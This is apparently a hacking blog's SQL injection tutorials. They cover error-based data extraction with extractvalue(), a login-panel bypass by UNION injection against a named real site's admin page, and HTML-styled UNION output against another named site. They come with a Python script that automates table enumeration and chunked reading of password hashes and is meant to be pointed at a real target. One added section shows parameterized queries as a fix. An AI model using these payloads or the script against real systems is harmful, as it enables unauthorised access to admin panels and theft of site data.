<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's execute this query against the target site.</span><br />
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,version()))-- -</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqDlXtrF4SrWglvoUPxyz8CINfD9xdKhvXqVXnhH-g8XFs5dtDUwIq_j3C1cjdu5OnABB-w2lw0q0bTmEPkMKTO4oGpdl0p6bLDLr_v6hzs-L30p0QlQj5pDixttW4V7WhmSZSot8e_aBk/s1600/XPATH+Injection+Using+Extractvalue+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqDlXtrF4SrWglvoUPxyz8CINfD9xdKhvXqVXnhH-g8XFs5dtDUwIq_j3C1cjdu5OnABB-w2lw0q0bTmEPkMKTO4oGpdl0p6bLDLr_v6hzs-L30p0QlQj5pDixttW4V7WhmSZSot8e_aBk/s400/XPATH+Injection+Using+Extractvalue+1.png" title="XPATH Injection Using Extractvalue" width="400" /></a></span></div>
<span style="font-size: small;">So this is The Version:<b>XPATH syntax error: ':5.5.42-37.1-log'</b></span><br />
<span style="font-size: small;">Now let's check the current database name.</span><br />
<span style="font-size: small;">Here is the query for the current database name:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,database()))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Execute this query against the target site.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,database()))-- -</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6LwmFs_b6TWVhu2aMTS_8GGM3taxk3_iI_jJnSFOtzPTVzJFjvyoqz5JGg8PJQIb_lEbbwdltfH7uXO9NVugcC4urOyLOGQjLkaeori_QGPALAd81w7EuSbt69KvxtC_tId4PwfXaDM-p/s1600/XPATH+Injection+Using+Extractvalue+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6LwmFs_b6TWVhu2aMTS_8GGM3taxk3_iI_jJnSFOtzPTVzJFjvyoqz5JGg8PJQIb_lEbbwdltfH7uXO9NVugcC4urOyLOGQjLkaeori_QGPALAd81w7EuSbt69KvxtC_tId4PwfXaDM-p/s400/XPATH+Injection+Using+Extractvalue+2.png" title="XPATH Injection Using Extractvalue" width="400" /></a></span></div>
<span style="font-size: small;">This is the current database name:<b> XPATH syntax error: ':dealitea_dealiteasy'</b></span><br />
<span style="font-size: small;">Now let's move on to finding the table names in that database<b>.</b></span><br />
<span style="font-size: small;">Here is the query for the table names:</span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))</b></span><br />
<span style="font-size: small;">The error message carries only one value, and a subquery used as a scalar must return exactly one row: with several tables MySQL answers "Subquery returns more than 1 row" instead of a table name. So we add LIMIT to the query and read the tables one by one.</span><br />
<span style="font-size: small;">With LIMIT the query becomes:</span><br />
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now execute this query against the target site to list the tables:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -</b></span><br />
<span style="font-size: small;">Increase the LIMIT offset to get the other tables in the current database.</span><br />
<span style="font-size: small;">Here we got the admin table:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgraZriSfHR5N_CrzkAtqWN7mVPNQI1Vqp_fwJLZy6lPg_oHpmiDdkco-xSyAu2mgNYwSFtEbO_ykKtMlvYhivPPHEzW2TEqhTdohqHNqcJzKYKgtncmsN5X-9Dt_gedXnu-cdtu757iNwF/s1600/XPATH+Injection+Using+Extractvalue+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgraZriSfHR5N_CrzkAtqWN7mVPNQI1Vqp_fwJLZy6lPg_oHpmiDdkco-xSyAu2mgNYwSFtEbO_ykKtMlvYhivPPHEzW2TEqhTdohqHNqcJzKYKgtncmsN5X-9Dt_gedXnu-cdtu757iNwF/s400/XPATH+Injection+Using+Extractvalue+3.png" title="XPATH Injection Using Extractvalue" width="400" /></a></span></div>
<span style="font-size: small;">Let's get the columns from this table:<b> XPATH syntax error: ':deal_admin'</b></span><br />
<span style="font-size: small;">Here is our query for the columns of the table. The table name is a string, so it must be quoted (or written as a hex literal if quotes are filtered):</span><br />
<span style="font-size: small;"><b>XPATH QUERY:</b></span><br />
<span style="font-size: small;"><b>and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name='OUR_TABLE_NAME_HERE' limit 0,1)))-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We execute this query to get the columns:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name='OUR_TABLE_NAME_HERE' limit 0,1)))-- -</b></span><br />
<span style="font-size: small;">Increase the LIMIT offset for the other columns in the table.</span><br />
<span style="font-size: small;">The final part is extracting data from the columns.</span><br />
<span style="font-size: small;">So here is our final query (LIMIT again keeps the subquery to one row; step the offset for the next row):</span><br />
<span style="font-size: small;"><b>XPATH QUERY:</b> <b>and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE limit 0,1)))-- -</b></span><br />
<span style="font-size: small;">Execute this query against the target site to read the column data. One caveat: MySQL shows at most 32 characters of the invalid XPath expression, so a long value such as a password hash comes back cut off; wrap the subquery in substr(...,1,31), then substr(...,32,31) and so on, to read it in pieces.</span><br />
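<span style="font-size: small;">The three XPATH tutorials on this page (the login-panel one above, and the UPDATEXML and Extractvalue ones) all run the same loop by hand: wrap a subquery in extractvalue() or updatexml(), read the value out of the XPATH syntax error, raise the LIMIT offset, repeat. The script below is an added example, not code from the original posts. It builds the same payloads, parses the leaked value out of the error text, walks the LIMIT offsets, and handles the 32-character error window by reading long values through substr() in 31-character pieces. The <b>send</b> callable, the <b>fake_target</b> stand-in with canned answers, and the names demo_table/demo_hash are assumptions made so it runs offline; against a real page, send would submit the payload in the injectable parameter and return the response body.</span><br />

```python
"""Error-based MySQL extraction through EXTRACTVALUE()/UPDATEXML().

Example code added to this page (not the original posts' code). It builds
the payloads the three XPATH tutorials use, parses the leaked value out of
the "XPATH syntax error" message, and pulls long values through MySQL's
32-character error window in pieces. The target below is a constructed
stand-in with canned answers, so the script runs offline."""
import re

ERROR_WIDTH = 32          # MySQL echoes at most 32 chars of the bad XPath expression
CHUNK = ERROR_WIDTH - 1   # one of them is our 0x3a (':') marker

LEAK_RE = re.compile(r"XPATH syntax error: ':([^']*)'")


def xpath_payload(expr, func="extractvalue"):
    """Wrap a SQL expression the way the posts do; both functions leak identically."""
    if func == "extractvalue":
        return "and extractvalue(0x3a,concat(0x3a,(%s)))" % expr
    if func == "updatexml":
        return "and updatexml(null,concat(0x3a,(%s)),null)" % expr
    raise ValueError("unsupported function: " + func)


def table_expr(index):
    return ("select table_name from information_schema.tables "
            "where table_schema=database() limit %d,1" % index)


def column_expr(table, index):
    return ("select column_name from information_schema.columns "
            "where table_name='%s' limit %d,1" % (table, index))


def row_expr(column, table, index):
    # LIMIT keeps the subquery scalar; without it MySQL raises
    # "Subquery returns more than 1 row" instead of leaking data.
    return "select %s from %s limit %d,1" % (column, table, index)


def parse_leak(body):
    """Text between the quotes of the XPATH error, or None when the page shows no error."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def extract(send, expr, func="extractvalue"):
    """Read a value of any length, CHUNK characters per request.

    `send` takes a payload string and returns the response body."""
    pieces, pos = [], 1
    while True:
        piece = parse_leak(send(xpath_payload(
            "substr((%s),%d,%d)" % (expr, pos, CHUNK), func)))
        if not piece:            # NULL row (no error shown) or substr past the end ('')
            break
        pieces.append(piece)
        if len(piece) < CHUNK:   # a short piece is the tail of the value
            break
        pos += CHUNK
    return "".join(pieces)


def enumerate_tables(send, func="extractvalue"):
    """Walk LIMIT 0,1 / 1,1 / 2,1 ... until the subquery yields NULL."""
    tables = []
    while True:
        name = extract(send, table_expr(len(tables)), func)
        if not name:
            return tables
        tables.append(name)


# ---- constructed stand-in for the vulnerable page (not a real target) ----
DEMO_HASH = "0123456789abcdef0123456789abcdef01234567"   # 40 made-up chars
FAKE_DB = {
    "version()": "5.5.42-37.1-log",
    "database()": "dealitea_dealiteasy",
    table_expr(0): "deal_admin",
    row_expr("demo_hash", "demo_table", 0): DEMO_HASH,    # hypothetical names
}
SUBSTR_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)")


def fake_target(payload):
    """Answer like a MySQL-backed page that prints its query errors."""
    m = SUBSTR_RE.search(payload)
    value = FAKE_DB.get(m.group(1)) if m else None
    if value is None:            # concat(0x3a, NULL) is NULL: no error, normal page
        return "<html>normal page</html>"
    pos, length = int(m.group(2)), int(m.group(3))
    shown = (":" + value[pos - 1:pos - 1 + length])[:ERROR_WIDTH]
    return "Invalid query:XPATH syntax error: '%s'" % shown


if __name__ == "__main__":
    print(extract(fake_target, "version()"))
    print(extract(fake_target, "database()", func="updatexml"))
    print(enumerate_tables(fake_target))
    print(extract(fake_target, row_expr("demo_hash", "demo_table", 0)))
```

<span style="font-size: small;">Against a real target, replace fake_target with a function that puts the payload into the injectable parameter (for the login panel, the user_id POST field with %23 appended) and returns the response body; nothing else changes. The 40-character demo value needs two requests, which is exactly the case the single-request queries in the posts cannot handle.</span><br />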
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com1tag:blogger.com,1999:blog-5545325473666478334.post-46734631388307770242015-07-12T10:15:00.000-07:002015-08-17T08:47:11.499-07:00Bypassing Login Panel with SQL Queries<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB3gnNmWHS2WmQ6QUU2rHhB_0K81eCtkdC2jDP4SYq9lUlok_KI5m7KOFWdc2Geu3s7c_FUS5_C9zhPe4z6c5fdeirp0qz8lbBpFw_AnnDUUxMrq5zHrYIWOob5FoiaYHuNznYq-V9lHD0/s1600/Bypassing+Login+Panel+with+SQL+Queries+www.raijee1337.blogspot.com+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB3gnNmWHS2WmQ6QUU2rHhB_0K81eCtkdC2jDP4SYq9lUlok_KI5m7KOFWdc2Geu3s7c_FUS5_C9zhPe4z6c5fdeirp0qz8lbBpFw_AnnDUUxMrq5zHrYIWOob5FoiaYHuNznYq-V9lHD0/s320/Bypassing+Login+Panel+with+SQL+Queries+www.raijee1337.blogspot.com+3.png" title="Bypassing Login Panel with SQL Queries" width="320" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bypassing Login Panel with SQL Queries Tutorial By RAi Jee</b></span><br />
<span style="font-size: small;">In this tutorial you will learn how to bypass a login panel with SQL injection queries.</span><br />
<span style="font-size: small;">The idea: we type SQL into the login fields of the admin panel; the application concatenates it into its login query, the database returns a row, and the application treats any returned row as a successful login. That gets us into the admin panel without a valid username or password.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Before injecting into the admin panel we need the Hackbar or Live HTTP Headers add-on installed in the browser.</span><br />
<span style="font-size: small;">The login form sends its fields by POST, so we need one of these add-ons to edit and resend the POST parameters.</span><br />
<span style="font-size: small;">I've picked a site for this tutorial.</span><br />
<span style="font-size: small;">Here is the target site:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://trentglobal.com/admin</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Either Live HTTP Headers or Hackbar will do for POST parameter injection; I will use Hackbar.</span><br />
<span style="font-size: small;">Now type some text in the username and password boxes and click LOGIN. Then enable Post Data in Hackbar so our POST parameters can be edited and resent.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH9M1W0aDq7LwGEZR9zFeq52HUl5w6B2JZZd8aVDbux68l8fJIVw2oZ0T0Rk6xKVZRUVtUH1w9Isupx56Nhkpe-cS9uGdo6Py6qXJv-g6LmlUGCnL2ixGBM-sr7p3EjpWE0mdbSDfHP9Gk/s1600/Bypassing+Login+Panel+with+SQL+Queries+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH9M1W0aDq7LwGEZR9zFeq52HUl5w6B2JZZd8aVDbux68l8fJIVw2oZ0T0Rk6xKVZRUVtUH1w9Isupx56Nhkpe-cS9uGdo6Py6qXJv-g6LmlUGCnL2ixGBM-sr7p3EjpWE0mdbSDfHP9Gk/s400/Bypassing+Login+Panel+with+SQL+Queries+1.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">Now click LOAD URL in Hackbar to pull the POST parameters into the POST DATA box. That is where we put our SQL injection queries.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzbldJJfj2vz95g08vARVnfvgkFwLwHZnPln74PBDL6agEEZoO9pg9ppUzy8SY4o5__k8MS2fmZk9hhU9So4IAedlAKkygOoetUwuOWnDAR9OoqNSnxx_wMlj-HsZWAK-qaDMIbNcJApT/s1600/Bypassing+Login+Panel+with+SQL+Queries+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzbldJJfj2vz95g08vARVnfvgkFwLwHZnPln74PBDL6agEEZoO9pg9ppUzy8SY4o5__k8MS2fmZk9hhU9So4IAedlAKkygOoetUwuOWnDAR9OoqNSnxx_wMlj-HsZWAK-qaDMIbNcJApT/s400/Bypassing+Login+Panel+with+SQL+Queries+2.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">The site answers Invalid Username and Password, but the POST data is now visible in Hackbar.</span><br />
<span style="font-size: small;">Here is our POST parameter: <b>uname=raijee&pwd=123456&log_submit=Login</b></span><br />
<span style="font-size: small;">Let's add a single quote, <b>uname=raijee'</b>, to test for SQL injection, and resend the request.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiObCNea8E1lZoT5Ww4lwUCq1wL-32uclPW3f4iRf96wYTKGimWa9l7b48OcZI_nC5XZToVrvfazZHzgWHJZwRj5-1gBgoli_hxlBUh4v5l3Pcacz-68lPBA-hX_hOcbFQEHc0-iwKHz-c7/s1600/Bypassing+Login+Panel+with+SQL+Queries+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiObCNea8E1lZoT5Ww4lwUCq1wL-32uclPW3f4iRf96wYTKGimWa9l7b48OcZI_nC5XZToVrvfazZHzgWHJZwRj5-1gBgoli_hxlBUh4v5l3Pcacz-68lPBA-hX_hOcbFQEHc0-iwKHz-c7/s400/Bypassing+Login+Panel+with+SQL+Queries+3.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">The quote produces a database error, so the uname parameter is injectable inside a string literal. Next we continue with string-based SQL injection.</span><br />
<span style="font-size: small;">Now let's count the columns of the login query.</span><br />
<span style="font-size: small;">We send ORDER BY probes in the POST parameters with Hackbar (%23 is the URL-encoded # that comments out the rest of the query):</span><br />
<span style="font-size: small;"><b>uname=raijee' order by 2%23</b></span><br />
<span style="font-size: small;"><b>No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>uname=raijee' order by 3%23</b></span><br />
<span style="font-size: small;"><b>No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>uname=raijee' order by 4%23</b></span><br />
<span style="font-size: small;"><b>No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>uname=raijee' order by 5%23</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCcMNHKFSv1E7qWQyCJHj1IYfRxgTTlYa-YZdYqIUcwSNvQTUj7MeJ3lZYodVJijHEIWFD2H98pFRcOWsALfz5oFjUEOlXG-mBnwFNbeUcV8BjJAUUNiTekI4FcnMD0kscp9dG5TXyBiUv/s1600/Bypassing+Login+Panel+with+SQL+Queries+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCcMNHKFSv1E7qWQyCJHj1IYfRxgTTlYa-YZdYqIUcwSNvQTUj7MeJ3lZYodVJijHEIWFD2H98pFRcOWsALfz5oFjUEOlXG-mBnwFNbeUcV8BjJAUUNiTekI4FcnMD0kscp9dG5TXyBiUv/s400/Bypassing+Login+Panel+with+SQL+Queries+4.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>We got an error: Unknown column '5' in 'order clause'</b></span><br />
<span style="font-size: small;">ORDER BY 5 fails and ORDER BY 4 worked, so the query selects <b>4</b> columns.</span><br />
<span style="font-size: small;">Now let's execute a UNION SELECT with 4 columns, in the same form as the probes above (uname=raijee' and 0 union select 1,2,3,4%23), so the query returns a row of our own.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMEniitzKdSpBfw7S3RBvXy0zVS23CFQsFnFpjwyDfIaNLB_o5WsXLV0h6-uJfXPgY9DjsXlhVpmuwJAmVgtLlFWnpa8_LYLZtSmlKeywh7GZNWlWluaCldIWVKGlqH51WEvvX-xWenqc/s1600/Bypassing+Login+Panel+with+SQL+Queries+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypassing Login Panel with SQL Queries" border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMEniitzKdSpBfw7S3RBvXy0zVS23CFQsFnFpjwyDfIaNLB_o5WsXLV0h6-uJfXPgY9DjsXlhVpmuwJAmVgtLlFWnpa8_LYLZtSmlKeywh7GZNWlWluaCldIWVKGlqH51WEvvX-xWenqc/s400/Bypassing+Login+Panel+with+SQL+Queries+5.png" title="Bypassing Login Panel with SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">Bingo! Admin panel bypassed: we have access to the admin panel without the admin user's username or password.</span><br />
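<span style="font-size: small;">The login check above is worth seeing from the application side. The following is an added example written for this page (not the author's code and not the target site's), run against an in-memory SQLite database: the same uname/pass query built by string concatenation beside its parameterized form. The table name, the four-column layout, the single admin row, and the use of SQLite's "--" comment in place of MySQL's "#" (the %23 above) are assumptions.</span><br />

```python
"""Added example (not from the blog post): the login query the post bypasses,
built two ways against an in-memory SQLite database.

Assumptions (not stated in the post): a table users(id, uname, pass, role)
with four columns and one admin row, and a check of the form
"WHERE uname='...' AND pass='...'". SQLite has no MySQL-style '#' comment,
so the post's %23 terminator is written as '-- ' here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single admin account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, uname TEXT, pass TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 's3cret', 'admin')")
    return con


def login_vulnerable(con, uname, pw):
    """String-concatenated query: the submitted text becomes part of the SQL.
    Returns (row, error) so the caller sees what the application would show:
    a matched row, nothing, or the database's error text."""
    sql = f"SELECT * FROM users WHERE uname='{uname}' AND pass='{pw}'"
    try:
        return con.execute(sql).fetchone(), None
    except sqlite3.OperationalError as exc:
        # MySQL reports "Unknown column '5' in 'order clause'" at this point;
        # SQLite says "ORDER BY term out of range". Either leaks the row width.
        return None, str(exc)


def login_parameterized(con, uname, pw):
    """Same query with bound parameters: the text is a value, never SQL."""
    sql = "SELECT * FROM users WHERE uname=? AND pass=?"
    return con.execute(sql, (uname, pw)).fetchone(), None


def column_count_probe(login, con, max_n=8):
    """The post's ORDER BY loop: the first n that errors means n-1 columns.
    Returns None when no probe errors, i.e. nothing was learned."""
    for n in range(1, max_n + 1):
        _, err = login(con, f"raijee' ORDER BY {n}-- ", "x")
        if err:
            return n - 1
    return None


# The post's 4-column UNION input, with the SQLite comment form.
UNION_INPUT = "raijee' UNION SELECT 1,2,3,4-- "


def demo():
    """Run both query styles through the same inputs and collect what each returns."""
    con = make_db()
    return {
        "vulnerable_columns": column_count_probe(login_vulnerable, con),
        "parameterized_columns": column_count_probe(login_parameterized, con),
        "vulnerable_union_row": login_vulnerable(con, UNION_INPUT, "x")[0],
        "parameterized_union_row": login_parameterized(con, UNION_INPUT, "x")[0],
        "real_login_row": login_parameterized(con, "admin", "s3cret")[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<span style="font-size: small;">Against the concatenated query the ORDER BY loop stops at 5 exactly as on the page, so the row width (4) leaks through the error text, and the UNION row comes back as if it were a matching user. The parameterized query treats the whole string as a username that does not exist: it returns nothing and never raises, so neither the count nor the bypass is available. Returning a generic failure to the client instead of the database's error message removes the second half of that signal even where a query cannot be parameterized.</span><br />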
<span style="font-size: small;"><br /></span>
<span style="color: #351c75; font-size: small;">HA</span><span style="color: #e06666; font-size: small;">ppY</span><span style="font-size: small;"> <span style="color: magenta;">Hack</span><span style="color: #fce5cd;">ing</span> <span style="color: cyan;">!!</span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</span><br />
<br />
<span style="font-size: small;"><b>Adding HTML Tags in SQL Queries</b> (published 2015-07-11, updated 2015-08-17)</span><br />
<div style="text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnTEDbMivs7AZsvxDWj-HjErUGpWf29WmEjBBRQmo4o4ckvnppeY1GN1Ueg8UHQ1nmKn_Ep4heiEDShbDngJydv_dGe4fQDEoqhuiDYLBSZG8pX0TmlhoymUSJRDxyPqfOatIvQW6HqIRH/s1600/Adding+HTML+Tags+in+SQL+Queries+tutorial+www.raijee1337.blogspot.com+By+RAi+Jee.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Adding HTML Tags in SQL Queries" border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnTEDbMivs7AZsvxDWj-HjErUGpWf29WmEjBBRQmo4o4ckvnppeY1GN1Ueg8UHQ1nmKn_Ep4heiEDShbDngJydv_dGe4fQDEoqhuiDYLBSZG8pX0TmlhoymUSJRDxyPqfOatIvQW6HqIRH/s320/Adding+HTML+Tags+in+SQL+Queries+tutorial+www.raijee1337.blogspot.com+By+RAi+Jee.png" title="Adding HTML Tags in SQL Queries" width="320" /></a></span></div>
<span style="font-size: small;"><b>Adding HTML Tags in SQL Queries - Tutorial by RAi Jee</b></span><br />
<span style="font-size: small;">HTML tags can be used for a lot of fun in SQL queries. We can use HTML tags to make the output colourful. Sometimes, when injecting a site, the vulnerable column is in the title or only in the page source, so we can also use HTML tags there to show the output on the page.</span><br />
<span style="font-size: small;">So we will start by adding HTML tags to make the output colourful.</span><br />
<span style="font-size: small;">Here is an example. We want to print the version in red, so here is our HTML tag for showing the version in red:</span><br />
<span style="font-size: small;"><b><span style="color: red;">&lt;font color=red&gt;</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Concat(<span style="color: red;">OUR_HTML_TAG</span>,<span style="color: lime;">QUERY_HERE</span>)</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's see the result. Before executing the query, first encode the HTML tag as a hex value, or put a single quote before and after the HTML tag, to make it executable.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.kimclement.com/basiccal/event.php<br />?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('&lt;font color=red&gt;',version()),8,9--+</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUlamuizHOac2pAvthn6TXCuPghO5q2Hp0Eb5SkDfhS_m9djK1ocYfNw7JN3o0_z8I6sK4U0H2R1cl6rxf-wY19lp_dlJDDoPWdbqwl5sT8BbB-eG2R3M5HeFu7z0JtZX3z6IhnEODX4Z/s1600/adding+html+tags+in+sql+queries+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Adding HTML Tags in SQL Queries" border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUlamuizHOac2pAvthn6TXCuPghO5q2Hp0Eb5SkDfhS_m9djK1ocYfNw7JN3o0_z8I6sK4U0H2R1cl6rxf-wY19lp_dlJDDoPWdbqwl5sT8BbB-eG2R3M5HeFu7z0JtZX3z6IhnEODX4Z/s400/adding+html+tags+in+sql+queries+1.png" title="Adding HTML Tags in SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">And you can see the version is in red. If we want to use a different colour for each command, like displaying the <span style="color: red;">version in red</span>, the <span style="color: lime;">database in green</span> and the <span style="color: blue;">user in blue</span>, we will use a different HTML tag for each task.</span><br />
<span style="font-size: small;"><b>See the example.</b></span><br />
<span style="font-size: small;"><b>Concat(<span style="color: red;">VERSION_IN_RED</span>,<span style="color: lime;">DATABASE_IN_GREEN</span>,<span style="color: blue;">USER_IN_BLUE</span>)</b></span><br />
<span style="font-size: small;"><b>HTML tags for each task:</b></span><br />
<span style="font-size: small;"><b>Red: <span style="color: red;">&lt;font color=red&gt;</span></b></span><br />
<span style="font-size: small;"><b>Green: <span style="color: lime;">&lt;font color=green&gt;</span></b></span><br />
<span style="font-size: small;"><b>Blue: <span style="color: blue;">&lt;font color=blue&gt;</span></b></span><br />
<span style="font-size: small;">So our final query for displaying each task in a different colour will be:</span><br />
<span style="font-size: small;"><b>Concat(<span style="color: red;">&lt;font color=red&gt;</span>,version(),<span style="color: lime;">&lt;font color=green&gt;</span>,database(),<span style="color: blue;">&lt;font color=blue&gt;</span>,user())</b></span><br />
<span style="font-size: small;">See the example.</span><br />
<span style="font-size: small;"><b>http://www.kimclement.com/basiccal/event.php<br />?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('&lt;font color=red&gt;',version(),0x3a,'&lt;font color=green&gt;',database(),0x3a,'&lt;font color=blue&gt;',user()),8,9--+</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6M7zcJePqdLzsguYesCJ4kiKNaIYOqMnXxkYra6IU687R8IuBIdNUv43SXn98S1YVR44_irhNNipljVONENBbIRYhFAVnCrNmiLvgBsdEbE1vNDYIS3e5nT_sXy80TvDYXLM01CkI-fI/s1600/adding+html+tags+in+sql+queries+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Adding HTML Tags in SQL Queries" border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6M7zcJePqdLzsguYesCJ4kiKNaIYOqMnXxkYra6IU687R8IuBIdNUv43SXn98S1YVR44_irhNNipljVONENBbIRYhFAVnCrNmiLvgBsdEbE1vNDYIS3e5nT_sXy80TvDYXLM01CkI-fI/s400/adding+html+tags+in+sql+queries+2.png" title="Adding HTML Tags in SQL Queries" width="400" /></a></span></div>
<span style="font-size: small;">As you can see in the picture, all tasks are complete. In this way you can also display tables and columns in different colours.</span><br />
<span style="font-size: small;">Now, after displaying SQLi output in different colours, let's see how we can display data when our vulnerable column is in the <b>page source</b> or in the <b>title</b>, using HTML tags.</span><br />
